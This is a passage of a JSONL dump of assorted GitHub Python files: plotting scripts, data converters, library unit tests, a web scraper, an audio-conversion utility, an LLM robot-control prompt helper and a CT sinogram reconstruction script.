tool legend back to the plot\nax.add_artist(tool_legend)\nax.add_artist(line_legend)\n\nplt.xticks(rotation=45)\n\nplt.tight_layout()\n\n# Save the figure before plt.show(): show() can close the figure, which would make a later savefig write a blank image\nplt.savefig(\"mark_plot_\"+ sys.argv[1]+\".png\", bbox_inches='tight')\n\n# Show the plot\nplt.show()\n","repo_name":"Mangul-Lab-USC/VISTA_paper","sub_path":"scripts/HPRC/mark_plot_customize.py","file_name":"mark_plot_customize.py","file_ext":"py","file_size_in_byte":2525,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} 
+{"seq_id":"29774137254","text":"from pathlib import Path\nimport shepherd_data.ivonne as ivonne\nimport shepherd_data.mppt as mppt\n\n# this repo contains a recording from ivonne\n# -> consists of voc & isc with 50 Hz sampling rate\n\n# this script converts a IVonne-Recording to shepherd dataformat:\n# - ivcurves that can be harvested during emulation\n# - ivsamples that can be directly used for emulation (already harvested with to different algorithms)\n# - isc_voc not directly usable (for now)\n\nif __name__ == \"__main__\":\n\n inp_file_path = Path(\"./jogging_10m.iv\")\n isc_file_path = Path(\"./jogging_10m_isc_voc.h5\")\n ivc_file_path = Path(\"./jogging_10m_ivcurves.h5\")\n voc_file_path = Path(\"./jogging_10m_ivsamples_voc.h5\")\n opt_file_path = Path(\"./jogging_10m_ivsamples_opt.h5\")\n\n with ivonne.Reader(inp_file_path) as db:\n db.upsample_2_isc_voc(isc_file_path)\n\n db.convert_2_ivcurves(ivc_file_path)\n\n tr_voc = mppt.OpenCircuitTracker(ratio=0.76)\n tr_opt = mppt.OptimalTracker()\n\n db.convert_2_ivsamples(voc_file_path, tracker=tr_voc)\n db.convert_2_ivsamples(opt_file_path, tracker=tr_opt)\n","repo_name":"geissdoerfer/shepherd-datalib","sub_path":"example_convert_ivonne.py","file_name":"example_convert_ivonne.py","file_ext":"py","file_size_in_byte":1113,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"40787295761","text":"import os\n\nos.environ[\"PYSPARK_PYTHON\"] = \"D://Python3//python.exe\"\n\nfrom pyspark import *\nfrom pyspark.sql import *\nimport matplotlib.pyplot as plt\n\n\ndef parse_group_result(time_array, status, tuple_list):\n print(\"\\nstatus:\" + str(status))\n\n print(\"time_array:\")\n print(time_array)\n dict = {}\n [dict.setdefault(each_time, each_Value) for each_time, each_Value in tuple_list]\n print(\"tuple_dict:\")\n print(dict)\n\n value_array = []\n for data_time in time_array:\n if data_time in dict:\n value = dict.get(data_time)\n value_array.append(value if value != 'None' else 0)\n else:\n value_array.append(0)\n\n print(\"value_array:\")\n print(value_array)\n return status, value_array\n\n\ndef show_as_line(rdd, legend_desc):\n time_array = rdd.map(lambda p: p[1]).distinct(1).collect()\n time_array.sort()\n print(time_array)\n\n values_rdd = rdd.map(lambda p: (str(p[0]), (p[1], p[2]))).groupByKey()\n r_map = values_rdd.map(\n lambda data: parse_group_result(time_array, data[0], data[1])).collectAsMap()\n\n fig, ax = plt.subplots()\n\n ax.set_xlabel('Time')\n ax.set_ylabel('Count')\n\n yticks = range(0, 100, 5)\n ax.set_yticks(yticks)\n # ax.set_ylim([0, 10])\n\n # xticks = range(0, 100, 5)\n # ax.set_yticks(yticks)\n\n for a, b in r_map.items():\n ax.plot(time_array, b, \"-\", label=legend_desc + str(a))\n\n \"\"\"open the grid\"\"\"\n plt.grid(True)\n plt.legend()\n plt.show()\n\n\nif __name__ == '__main__':\n conf = SparkConf().setAppName(\"logReader\").setMaster(\"local[10]\")\n conf.set(\"mytest.sql.crossJoin.enabled\", True)\n conf.set(\"mytest.sql.shuffle.partitions\", 5)\n conf.set(\"mytest.defalut.parallelism\", 10)\n sc = SparkContext(conf=conf)\n sql_context = SQLContext(sc)\n # sc.setLogLevel(\"DEBUG\")\n\n # files=[\"E://logs//ceph//ucsm-osd.37.log\",\"E://logs//ceph//ucsm-osd.39.log\",\n # \"E://logs//ceph//ucsm-osd.42.log\", \"E://logs//ceph//ucsm-osd.43.log\"]\n\n # files = [\"E://logs//ceph//ucsm-osd.*.log\"];\n file = \"E://mldata//predict//hostresource_nonet.csv\";\n\n df = sql_context.read.format('com.databricks.spark.csv').options(header='true', 
inferschema='true').load(\n file)\n data_rdd = df.select(\"hostaddr\", \"createtime\", \"cpu_usage\").filter(\"hostaddr='192.168.232.183'\").rdd\n data_rdd.cache()\n print(data_rdd.take(3))\n show_as_line(data_rdd, \"cpu\")\n","repo_name":"happy-lu/spark","sub_path":"predict/TimeSeries2.py","file_name":"TimeSeries2.py","file_ext":"py","file_size_in_byte":2416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"14540419780","text":"\"\"\"This test file is ignored by mypy so don't rely on type assertions in this.\n\nInstead, take a look at the ``tests/test_mypy.py``.\n\"\"\"\nimport pytest\nfrom web_poet import HttpResponse, RequestUrl, ResponseUrl\n\nfrom zyte_common_items import (\n Breadcrumb,\n Image,\n Link,\n Product,\n ProductFromList,\n ProductList,\n ProductVariant,\n)\n\n\n@pytest.mark.parametrize(\n \"cls,fields\",\n [\n (Image, [\"url\"]),\n (Breadcrumb, [\"url\"]),\n (Link, [\"url\"]),\n (Product, [\"url\", \"canonicalUrl\"]),\n (ProductList, [\"url\", \"canonicalUrl\"]),\n (ProductFromList, [\"url\"]),\n (ProductVariant, [\"url\", \"canonicalUrl\"]),\n ],\n)\ndef test_webpoet_URL_classes(cls, fields):\n \"\"\"Ensure that the URL classes from web-poet are properly converted into\n URL strings when instantiating.\n \"\"\"\n url = \"https://www.some-url.com\"\n response = HttpResponse(url, b\"\")\n\n response_url_obj = response.url\n assert type(response_url_obj) == ResponseUrl\n\n request_url_obj = response.urljoin(\"/another-page\")\n assert type(request_url_obj) == RequestUrl\n\n # Ensure that both types of URL classes are covered\n for url_obj in [response_url_obj, request_url_obj]:\n data = {field: url_obj for field in fields}\n obj = cls(**data)\n\n for field in fields:\n # The URL classes should be converted to strings on instantiation\n attribute = getattr(obj, field)\n assert type(attribute) == str\n assert attribute == str(url_obj)\n\n # The conversion should also work via field assignment\n setattr(obj, field, response.urljoin(\"/somewhere\"))\n attribute = getattr(obj, field)\n assert type(attribute) == str\n assert attribute == \"https://www.some-url.com/somewhere\"\n\n # Setting other values that are not strings or URL classes would\n # raise a ValueError\n with pytest.raises(ValueError):\n setattr(obj, field, 123)\n\n\n@pytest.mark.parametrize(\"cls\", [ProductVariant, Product, ProductFromList])\ndef test_webpoet_URL_mainImage(cls):\n response = HttpResponse(\"https://www.some-page\", b\"\")\n data = {\n \"mainImage\": {\n \"url\": response.urljoin(\"img1.png\"),\n },\n \"url\": response.url,\n }\n assert type(data[\"mainImage\"][\"url\"]) == RequestUrl\n\n # The URL classes should be converted to strings on instantiation\n obj = cls.from_dict(data)\n assert type(obj.mainImage) == Image\n assert obj.mainImage.url == \"https://www.some-page/img1.png\"\n\n # The conversion should also work via field assignment\n img_url = response.urljoin(\"/different-img.png\")\n assert type(img_url) == RequestUrl\n obj.mainImage.url = img_url\n assert type(obj.mainImage) == Image\n assert obj.mainImage.url == \"https://www.some-page/different-img.png\"\n\n # Setting other values that are not strings or URL classes would\n # raise a ValueError\n with pytest.raises(ValueError):\n obj.mainImage.url = False\n\n data = {\"mainImage\": {\"url\": 123}, \"url\": 123}\n with pytest.raises(ValueError):\n obj = cls.from_dict(data)\n\n\n@pytest.mark.parametrize(\"cls\", [ProductVariant, Product])\ndef test_webpoet_URL_images(cls):\n 
response = HttpResponse(\"https://www.some-page\", b\"\")\n data = {\n \"images\": [\n {\"url\": response.urljoin(\"img1.png\")},\n {\"url\": response.urljoin(\"img2.png\")},\n ],\n \"url\": response.url,\n }\n assert type(data[\"images\"][0][\"url\"]) == RequestUrl\n\n # The URL classes should be converted to strings on instantiation\n obj = cls.from_dict(data)\n assert type(obj.images[0]) == Image\n assert [img.url for img in obj.images] == [\n \"https://www.some-page/img1.png\",\n \"https://www.some-page/img2.png\",\n ]\n\n # The conversion should also work via field assignment\n img_url = response.urljoin(\"/different-img.png\")\n assert type(img_url) == RequestUrl\n obj.images[0].url = img_url\n assert type(obj.images[0]) == Image\n assert obj.images[0].url == \"https://www.some-page/different-img.png\"\n\n # Setting other values that are not strings or URL classes would\n # raise a ValueError\n with pytest.raises(ValueError):\n obj.images[1].url = False\n\n data = {\n \"images\": [\n {\"url\": 123},\n {\"url\": 456},\n ],\n \"url\": 789,\n }\n with pytest.raises(ValueError):\n obj = cls.from_dict(data)\n","repo_name":"zytedata/zyte-common-items","sub_path":"tests/test_conversion.py","file_name":"test_conversion.py","file_ext":"py","file_size_in_byte":4492,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"52"} +{"seq_id":"38476182343","text":"import itertools\nimport os\nimport shutil\nimport sys\nimport threading\nimport time\n\ndef loading():\n for s in itertools.cycle(['|', '/', '-', '\\\\']):\n if done:\n break\n sys.stdout.write('\\rloading ' + s)\n sys.stdout.flush()\n time.sleep(0.1)\n\ndef options(option):\n global purge\n global rmFile\n if(option == \"p\"):\n purge = True\n if(option == \"r\"):\n rmFile = True\n\ndef osVersion(owd):\n global ffBin\n if os.name == 'nt':\n try:\n os.system('ffmpeg')\n os.system('cls')\n except:\n ffBin = owd+\"/ffmpeg/ffmpeg-latest-win64-static/bin/ffmpeg.exe\"\n else:\n ffBin = \"ffmpeg\"\n else:\n try:\n os.system('ffmpeg')\n os.system('clear')\n except:\n breaker = True\n else:\n ffBin = \"ffmpeg\"\n\ndef purger():\n youSure = raw_input(\"Are you sure?\\nType \\\"Yes\\\" if you're sure.> \")\n if(youSure == \"Yes\"):\n shutil.rmtree(musicDir)\n os.makedirs(musicDir)\n sys.exit()\n else:\n print(\"Continuing without Deletion\")\n sys.exit()\n\nafterSize = 0\nbeforeSize = 0\ndone = False\next = [\".mp3\", \".ogg\", \".m4a\", \".flac\"]\nnoRepeat = 0\nowd = os.getcwd()\npurge = False\nrmFile = False\n\nif os.path.isfile(\"directory.ini\"):\n musicDir = open('directory.ini').read()\n\nelse:\n musicDir = owd + \"/music\"\n if not os.path.exists(\"music\"):\n os.makedirs(\"music\")\n\nosVersion(owd)\n\nif not os.path.exists(\"ffmpeg\") and os.name == 'nt' and ffBin != \"ffmpeg\":\n print(\"Go get ffmpeg please. 
Or use the batch.\")\n sys.exit()\n\ndragNDrop = ''.join(sys.argv[1:2])\ndragNDrop2 = ''.join(sys.argv[2:3])\n\nif dragNDrop == 'h':\n print(\"Welcome to the Help Menu\\nh: Help\\np: Purge Old Files\\nr: Remove Original Files After Use\")\n raw_input(\"\\nPress Enter to quit...\")\n sys.exit()\n\nif dragNDrop != '':\n options(dragNDrop)\n\nif dragNDrop2 != '':\n options(dragNDrop2)\n\nif dragNDrop != '':\n if(purge == True):\n purger()\n\ng = threading.Thread(target=loading)\ng.start()\n\nfor dname, dirs, files in os.walk(musicDir):\n for fname in files:\n fpath = os.path.join(dname, fname)\n if fname.endswith(tuple(ext)):\n stopPoint = fpath.rfind('.')\n songName = fpath[:stopPoint]\n os.system(ffBin + \" -loglevel panic -y -i \\\"\" + fpath + \"\\\" -acodec libopus -vbr on \\\"\" + songName +\".opus\\\"\")\n try:\n beforeSize += os.path.getsize(fpath)\n afterSize += os.path.getsize(songName + \".opus\")\n except:\n if(noRepeat == 0):\n noRepeat = 1\n os.rename(songName + \".opus\",songName + \".ogg\")\n if dragNDrop != '':\n if(rmFile == True):\n try:\n os.remove(fpath)\n except:\n if(noRepeat == 0):\n print(\"Probably a Japanese file, it won't go through conversion.\")\n\nafterSize = afterSize/1000000\nbeforeSize = beforeSize/1000000\ndone = True\n\nprint(\"\\nAll done! Your music library went from being \" + str(beforeSize) + \"MBs, to being \" + str(afterSize) + \"MBs, congrats!\")\nraw_input(\"\\nPress Enter to continue...\")\n","repo_name":"GarnetSunset/Opusifier","sub_path":"opusiFier.py","file_name":"opusiFier.py","file_ext":"py","file_size_in_byte":3264,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"74660465763","text":"class Solution(object):\n def isPalindrome(self, x):\n \n strlist = list(str(x))\n \n reversestr = list(reversed(strlist))\n if strlist == reversestr:\n return True\n else:\n return False\n \n# i = 0\n# while i == len(strlist):\n# if strlist[i] != reversestr[i]:\n# return False\n# i += 1\n \n# return True\n \n ","repo_name":"lsh981127/LeetCode","sub_path":"0009-palindrome-number/0009-palindrome-number.py","file_name":"0009-palindrome-number.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"74781349605","text":"import unittest\nimport sqlite3\nfrom datetime import datetime\n\nfrom dateutil.tz import tzutc\n\nfrom logilab.common.testlib import MockConnection\n\nfrom logilab.database import sqlite as lgdbsqlite\nfrom logilab.database import get_connection, get_db_helper\n\n\nclass SQLiteHelperTC(unittest.TestCase):\n\n def setUp(self):\n self.cnx = MockConnection( () )\n self.helper = get_db_helper('sqlite')\n\n def test_type_map(self):\n self.assertEqual(self.helper.TYPE_MAPPING['TZDatetime'], 'tzdatetime')\n self.assertEqual(self.helper.TYPE_MAPPING['Datetime'], 'timestamp')\n self.assertEqual(self.helper.TYPE_MAPPING['String'], 'text')\n self.assertEqual(self.helper.TYPE_MAPPING['Password'], 'bytea')\n self.assertEqual(self.helper.TYPE_MAPPING['Bytes'], 'bytea')\n\n\nclass SQLiteAdapterTC(unittest.TestCase):\n\n @unittest.expectedFailure\n def test_only_one_lazy_module_initialization(self):\n self.assertFalse(lgdbsqlite._Sqlite3Adapter._module_is_initialized)\n adapter = lgdbsqlite._Sqlite3Adapter(sqlite3)\n self.assertTrue(adapter._module_is_initialized)\n\n def test_tzsupport(self):\n cnx = get_connection(database=':memory:', driver='sqlite')\n cu = cnx.cursor()\n cu.execute('CREATE TABLE 
tztest(tzt tzdatetime)')\n now = datetime.now(tzutc())\n cu.execute('INSERT INTO tztest VALUES (%(tzt)s)', {'tzt': now})\n cu.execute('SELECT * FROM tztest')\n dbnow = cu.fetchone()[0]\n self.assertEqual(dbnow, now)\n\n cu.execute('UPDATE tztest SET tzt=(%(tzt)s)', {'tzt': datetime.utcnow()})\n cu.execute('SELECT * FROM tztest')\n dbnow = cu.fetchone()[0]\n self.assertEqual(dbnow.tzinfo, tzutc())\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"gurneyalex/logilab-database","sub_path":"test/unittest_sqlite.py","file_name":"unittest_sqlite.py","file_ext":"py","file_size_in_byte":1774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"22648994376","text":"from 데이터수집.WebCrawling import getRequestUrl\nfrom bs4 import BeautifulSoup \nserviceUrl = 'https://www.hollys.co.kr/store/korea/korStore2.do?'\n\nitemList = []\nfor page in range(1, 2) : \n param = f'pageNo={page}'\n url = serviceUrl+param\n html = getRequestUrl(url)\n soup = BeautifulSoup(html, 'html.parser')\n #html\n #print(soup.prettify()) #HTML정보를 예쁘게 정렬해서 출력\n tag_tbody = soup.find('tbody') #tbody태그 하나만 찾아서 리턴\n tag_trs = tag_tbody.find_all('tr') #tr태그들 찾아서 리스트로 반환\n tag_trs\n for tr in tag_trs :\n #한행씩\n tag_tds = tr.find_all('td')\n itemDic = {}\n itemDic['지역정보'] = tag_tds[0].text #지역정보 \n itemDic['매장명'] = tag_tds[1].text \n itemDic['매장현황'] = tag_tds[2].text #(영업중, 오픈예정 등)\n itemDic['주소'] = tag_tds[3].text #매장주소 \n itemDic['전화번호'] = tag_tds[5].text #지역정보\n itemList.append(itemDic)\n\nprint(\"총 매장 개수 : \", len(itemList))\nitemList\n#데이터 저장\nimport json\nwith open('./데이터수집/정적웹크롤링/할리스카페매장.json', 'w',\n encoding='utf-8') as f :\n retJson = json.dumps(itemList, indent=4, ensure_ascii=False)\n f.write(retJson)\n\n#csv 파일 포맷으로 저장\n# 매장명,지역정보,주소,전화번호,..\n# 수워홀리스,권선동,권선동,010-311-3333\nwith open('./데이터수집/정적웹크롤링/할리스카페매장.csv', 'w',\n encoding='utf-8') as f :\n colList = itemList[0].keys()\n colList #dict_keys(['지역정보', '매장명', '매장현황', '주소', '전화번호'])\n ','.join(colList)+\"\\n\" #'지역정보,매장명,매장현황,주소,전화번호\\n'\n f.write(','.join(colList)+\"\\n\")\n for item in itemList :\n f.write(','.join(item.values()) + \"\\n\")\n\nimport pandas as pd\ndf = pd.DataFrame(itemList, columns=itemList[0].keys())\ndf.head()\ndf.info()\ndf.to_csv('./데이터수집/정적웹크롤링/할리스카페매장2.csv',\n encoding='utf-8', index=True)\n\ndf.to_json('./데이터수집/정적웹크롤링/할리스카페매장2.json',\n orient='records', force_ascii=False, indent=4)\n\n","repo_name":"sf7com/python_study","sub_path":"데이터수집/정적웹크롤링/2_할리스카페매장정보.py","file_name":"2_할리스카페매장정보.py","file_ext":"py","file_size_in_byte":2226,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"30879939677","text":"import openai\nimport textwrap\n\ndef llm_init():\n openai.api_key = 'Please input your API key here.'\n\n global prompt_system, prompt_history, query_count\n\n prompt_system = '''\n You are the controller of a quadrupedal robot (A1 robot) with 10 Hz.\n Please inference the output.\n \n The robot's state is represented by a 33-dimensional input space.\n The first 3 dimensions correspond to the robot's linear velocity.\n The next 3 dimensions denote the robot's angular velocity.\n The following 3 dimensions represent the gravity vector.\n The subsequent 12 dimensions represent the joint positions.\n The final 12 dimensions indicate the velocity of each joint.\n\n The output space is 12-dimension, which is the joint position. 
\n \n The order of the joints is [FRH, FRT, FRC, FLH, FLT, FLC, RRH, RRT, RRC, RLH, RLT, RLC].\n\n After we have the output, we will use 200 Hz PD controller to track it.\n\n The following are past and consecutive inputs and outputs.\n All numbers are normalized to non-negative integers by our special rule. \n The output would be impacted by the previous inputs.\n The trend of the outputs should be smooth.\n\n Your output is only one line and starts with \"Output:\", please do not output other redundant words.\n \n '''\n prompt_system = textwrap.dedent(prompt_system)\n prompt_system = prompt_system.split('\\n', 1)[1]\n\n prompt_history = ''\n\n query_count = 0\n\ndef llm_query(msg, call_api=True):\n global prompt_system, prompt_history, query_count\n\n prompt_history = prompt_history + msg + '\\n'\n\n if call_api:\n completion = openai.ChatCompletion.create(\n model=\"gpt-4-0613\", # \"gpt-3.5-turbo-16k\"\n messages=[\n {\"role\": \"system\", \"content\": prompt_system},\n {\"role\": \"user\", \"content\": prompt_history}\n ],\n temperature=0.0\n )\n\n res = completion.choices[0].message.content\n res = res.split('\\n', 1)[0]\n\n query_count += 1\n\n if query_count > 50:\n prompt_history = prompt_history.split('\\n', 1)[1]\n prompt_history = prompt_history.split('\\n', 1)[1]\n\n if call_api:\n return res\n else:\n return None","repo_name":"HybridRobotics/prompt2walk","sub_path":"src/llm.py","file_name":"llm.py","file_ext":"py","file_size_in_byte":2223,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"52"} +{"seq_id":"28045505598","text":"\r\n#################################################################\r\n# Imports\r\n#################################################################\r\n\r\nimport numpy as np \r\nimport imutils\r\nfrom skimage.transform import rotate ## Image rotation routine\r\nimport scipy.fftpack as fft ## Fast Fourier Transform\r\nimport imageio ## Used to save images\r\nimport math\r\n\r\n#################################################################\r\n# Functions\r\n#################################################################\r\n\r\n#Converts the sinogram single channel \r\n#to frequency domain using fast fourier transform\r\ndef ch_fft(channel):\r\n #Build 1-d FFTs of an array of projections, each projection 1 row of the array.\r\n return fft.rfft(channel, axis = 1)\r\n\r\n# Filter the projections of each channel\r\n# using a ramp filter\r\ndef ramp_filter(ch_proj):\r\n #Ramp filter a 2-d array of 1-d FFTs (1-d FFTs along the rows).\r\n ramp = np.floor(np.arange(0.5, ch_proj.shape[1]//2 + 0.1, 0.5))\r\n return ch_proj * ramp\r\n\r\n# Applied Hamming windowed ramp filter to channel passed in.\r\ndef hamming_window(ch_proj): \r\n ramp = np.floor(np.arange(0.5, ch_proj.shape[1]//2 + 0.1, 0.5))\r\n window_filter = ramp\r\n \r\n # Initialise variables for hamming window\r\n c = 0.54\r\n N = ch_proj.shape[1] # length of input channel = 658\r\n hamming = np.zeros(N//2) # Array of zeros of length 329\r\n \r\n # Create hamming window for N/2 elements\r\n for i in range(N//2):\r\n hamming[i] = (c+((1-c)*math.cos(math.pi*(i/((N/2)-1)))))\r\n # Multiply Hamming window by corresponding Ramp filter values\r\n for i in range(1,(N//2)):\r\n window_filter[(i*2)-1] = ramp[(i*2)-1]*hamming[i]\r\n window_filter[i*2] = ramp[i*2]*hamming[i]\r\n \r\n window_filter[-1] = ramp[-1]*hamming[-1]\r\n \r\n # return input channel times windowed ramp filter\r\n return ch_proj*window_filter\r\n\r\n# Applies Hann windowed ramp filter to 
channel passed in\r\ndef hann_window(ch_proj):\r\n ramp = np.floor(np.arange(0.5, ch_proj.shape[1]//2 + 0.1, 0.5))\r\n window_filter = ramp\r\n \r\n # Initialise variables for hamming window\r\n c = 0.5\r\n N = ch_proj.shape[1] # length of input channel = 658\r\n hann = np.zeros(N//2) # Array of zeros of length 329\r\n \r\n # Create Hann window for N/2 elements\r\n for i in range(N//2):\r\n hann[i] = (c+(c*math.cos(math.pi*(i/((N/2)-1)))))\r\n \r\n # Multiplies Hann window values by corresponding ramp filter values\r\n for i in range(1,(N//2),1):\r\n window_filter[(i*2)-1] = ramp[(i*2)-1]*hann[i]\r\n window_filter[i*2] = ramp[i*2]*hann[i]\r\n \r\n window_filter[-1] = ramp[-1]*hann[-1]\r\n\r\n # return input channel times windowed ramp filter\r\n return ch_proj*window_filter\r\n\r\n# Return channel using inverse fast fourier transform\r\n# to the spatial domain\r\ndef inverse_fft(channel):\r\n return fft.irfft(channel, axis = 1)\r\n\r\n# Returns the reconstructed image \r\n# by back projecting the filtered projections\r\ndef back_projection(channel):\r\n \r\n #laminogram equal to images height\r\n laminogram = np.zeros((channel.shape[1],channel.shape[1]))\r\n dTheta = 180.0 / channel.shape[0]\r\n \r\n #rotate image and plot values on linogram\r\n for i in range(channel.shape[0]):\r\n arr = np.tile(channel[i],(channel.shape[1],1))\r\n temp = rotate(arr, dTheta*i)\r\n laminogram += temp\r\n return laminogram\r\n\r\n# Crops image into square\r\ndef crop(channel):\r\n #square length = diameter/square root(2)\r\n side = int(channel.shape[0]/math.sqrt(2))\r\n new_ch = []\r\n \r\n #width start and end points\r\n s_width = int((channel.shape[0]/2)-side/2)\r\n e_width = int((channel.shape[0]/2)+side/2)\r\n\r\n #height start and end points\r\n s_height = int((channel.shape[1]/2)-side/2)\r\n e_height = int((channel.shape[1]/2)+side/2)\r\n\r\n #cropping channel \r\n for i in channel[s_width:e_width]:\r\n new_ch.append(i[s_height:e_height])\r\n new_ch = np.reshape(new_ch,(side,side))\r\n return new_ch\r\n\r\n# Rescales channel to 8bit channel\r\ndef ch_rescale(channel):\r\n cr_ch = crop(channel)\r\n chi,clo = cr_ch.max(),cr_ch.min()\r\n chnorm = 255*(cr_ch-clo)/(chi-clo)\r\n ch8bit = np.floor(chnorm).astype('uint8')\r\n return ch8bit\r\n\r\n# Applies inverse fast fourier transform and back projection to each channel\r\n# input to the function. Channels then scaled and cropped.\r\ndef reconstruction(r_cha, g_cha, b_cha, filter_type):\r\n #Converting colour channels to spacial domain using inverse FFT\r\n spatial_dom_red = inverse_fft(r_cha)\r\n spatial_dom_green = inverse_fft(g_cha)\r\n spatial_dom_blue = inverse_fft(b_cha)\r\n \r\n #Back projecting colour channels\r\n recon_im_red = back_projection(spatial_dom_red)\r\n recon_im_green = back_projection(spatial_dom_green)\r\n recon_im_blue = back_projection(spatial_dom_blue)\r\n \r\n # Display back projected images including edge artifacts\r\n imutils.imshow(recon_im_red, title = \"Red channel backprojections for \" + filter_type )\r\n imutils.imshow(recon_im_green, title = \"Green channel backprojections for \" + filter_type)\r\n imutils.imshow(recon_im_blue, title = \"Blue channel backprojections for \" + filter_type) \r\n \r\n #Rescaling channels to 8 bit and cropping image\r\n red_scaled= ch_rescale(recon_im_red)\r\n green_scaled= ch_rescale(recon_im_green)\r\n blue_scaled= ch_rescale(recon_im_blue)\r\n \r\n return red_scaled, green_scaled, blue_scaled\r\n\r\n# Calculates the mean squared error between the two input images. 
Images\r\n# must be the same size\r\ndef mse(imageA, imageB):\r\n\t# the 'Mean Squared Error' between the two images is the\r\n\t# sum of the squared difference between the two images;\r\n\terr = np.sum((imageA.astype(\"float\") - imageB.astype(\"float\")) ** 2)\r\n\terr /= float(imageA.shape[0] * imageA.shape[1])\r\n\t\r\n\t# return the MSE, the lower the error, the more similar\r\n\treturn err\r\n\r\n## Statements\r\n##Import coloured image (RGB)\r\nprint(\"Original Sinogram\")\r\nsinogram = imutils.imread('sinogram.png',greyscale = False)\r\nimutils.imshow(sinogram, title = \"Original Sinogram image\")\r\nimageio.imwrite('originalSinogramImage.png', sinogram)\r\n\r\n##splitting the image into 3 colours\r\nred = sinogram[:,:,0]\r\ngreen = sinogram[:,:,1]\r\nblue = sinogram[:,:,2]\r\n\r\n#Reshaping the colours to give rows\r\nred = np.reshape(red,(360,658))\r\ngreen = np.reshape(green,(360,658))\r\nblue = np.reshape(blue,(360,658))\r\n\r\n#################################################################\r\n#Reconstruction of each colour channel without any filtering\r\n#################################################################\r\n\r\nprint(\"Reconstruction with no filtering\")\r\nunfiltered_red = back_projection(red)\r\nunfiltered_green = back_projection(green)\r\nunfiltered_blue = back_projection(blue)\r\n\r\n# Display back projected images including edge artifacts\r\nimutils.imshow(unfiltered_red, title = \"Red channel Backprojection without filtering\")\r\nimutils.imshow(unfiltered_green, title = \"Green channel Backprojection without filtering\")\r\nimutils.imshow(unfiltered_blue, title = \"Blue channel Backprojection without filtering\") \r\n\r\n#Rescaling channels to 8 bit and cropping image\r\nred_rescaled = ch_rescale(unfiltered_red)\r\ngreen_rescaled = ch_rescale(unfiltered_green)\r\nblue_rescaled = ch_rescale(unfiltered_blue)\r\n\r\nimutils.imshow(red_rescaled, title = \"Red channel without filtering, cropped and scaled to 8-bit\")\r\nimutils.imshow(green_rescaled, title = \"Blue channel without filtering, cropped and scaled to 8-bit\")\r\nimutils.imshow(blue_rescaled, title = \"Blue channel without filtering, cropped and scaled to 8-bit\")\r\n\r\n#Reconstruct all channels to one image\r\nprint(\"Reconstructed coloured image\\n\\n\")\r\nimage = np.dstack((red_rescaled,green_rescaled,blue_rescaled))\r\nimutils.imshow(image, title = \"Reconstruction without filtering\")\r\n\r\n#################################################################\r\n#Reconstruction of each colour channel with simple rampfiltering\r\n#################################################################\r\n\r\nprint(\"Performing simple ramp filtered reconstruction\")\r\n#Convert channels to Frequency domain\r\nred_fft = ch_fft(red)\r\ngreen_fft = ch_fft(green)\r\nblue_fft = ch_fft(blue)\r\n\r\n#Ramp channels\r\nred_filt = ramp_filter(red_fft)\r\ngreen_filt = ramp_filter(green_fft)\r\nblue_filt = ramp_filter(blue_fft)\r\n\r\n#Rescaling channels to 8 bit and cropping image\r\nred_rescaled, green_rescaled, blue_rescaled = reconstruction(red_filt, green_filt, blue_filt, \"ramp filter\")\r\n\r\nimutils.imshow(red_rescaled, title = \"Red channel ramp filtering, cropped and scaled to 8-bit\")\r\nimutils.imshow(green_rescaled, title = \"Green channel rampfiltering, cropped and scaled to 8-bit\")\r\nimutils.imshow(blue_rescaled, title = \"Blue channel ramp filtering, cropped and scaled to 8-bit\")\r\n\r\n#Reconstruct all channels to one image\r\nprint(\"Simple ramp filtered reconstruction 
complete.\\n\\n\")\r\nimage_ramp=np.dstack((red_rescaled,green_rescaled,blue_rescaled))\r\nimutils.imshow(image_ramp, title = \"Reconstruction with ramp filtering\")\r\n\r\n#################################################################\r\n#Reconstruction of each colour channel with Hamming window filter\r\n#################################################################\r\n\r\nprint(\"Performing Hamming window ramp filtered reconstruction\")\r\n#Convert channels to Frequency domain\r\nred_fft = ch_fft(red)\r\ngreen_fft = ch_fft(green)\r\nblue_fft = ch_fft(blue)\r\n\r\n#Hamming window channels\r\nred_filt = hamming_window(red_fft)\r\ngreen_filt = hamming_window(green_fft)\r\nblue_filt = hamming_window(blue_fft)\r\n\r\n#Rescaling channels to 8 bit and cropping image\r\nred_rescaled, green_rescaled, blue_rescaled = reconstruction(red_filt, green_filt, blue_filt, \"Hamming windowed filter\")\r\n\r\nimutils.imshow(red_rescaled, title = \"Red channel Hamming window filtering, cropped and scaled to 8-bit\")\r\nimutils.imshow(green_rescaled, title = \"Green channel: Hamming window filtering, cropped and scaled to 8-bit\")\r\nimutils.imshow(blue_rescaled, title = \"Blue channel Hamming window filtering, cropped and scaled to 8-bit\")\r\n\r\n#Reconstruct all channels to one image\r\nprint(\"Hamming window ramp filtered reconstruction complete.\\n\\n\")\r\nimage_hamming=np.dstack((red_rescaled,green_rescaled,blue_rescaled))\r\nimutils.imshow(image_hamming, title = \"Reconstruction with Hamming windowed ramp filtering\")\r\n\r\n#################################################################\r\n#Reconstruction of each colour channel with Hann window filter\r\n#################################################################\r\n\r\nprint(\"Performing Hann window ramp filtered reconstruction\")\r\n#Convert channels to Frequency domain\r\nred_fft = ch_fft(red)\r\ngreen_fft = ch_fft(green)\r\nblue_fft = ch_fft(blue)\r\n\r\n#Hann window channels\r\nred_filt = hann_window(red_fft)\r\ngreen_filt = hann_window(green_fft)\r\nblue_filt = hann_window(blue_fft)\r\n\r\n#Rescaling channels to 8 bit and cropping image\r\nred_rescaled, green_rescaled, blue_rescaled = reconstruction(red_filt, green_filt, blue_filt, \"Hann windowed filter\")\r\n\r\nimutils.imshow(red_rescaled, title = \"Red channel Hann window filtering, cropped and scaled to 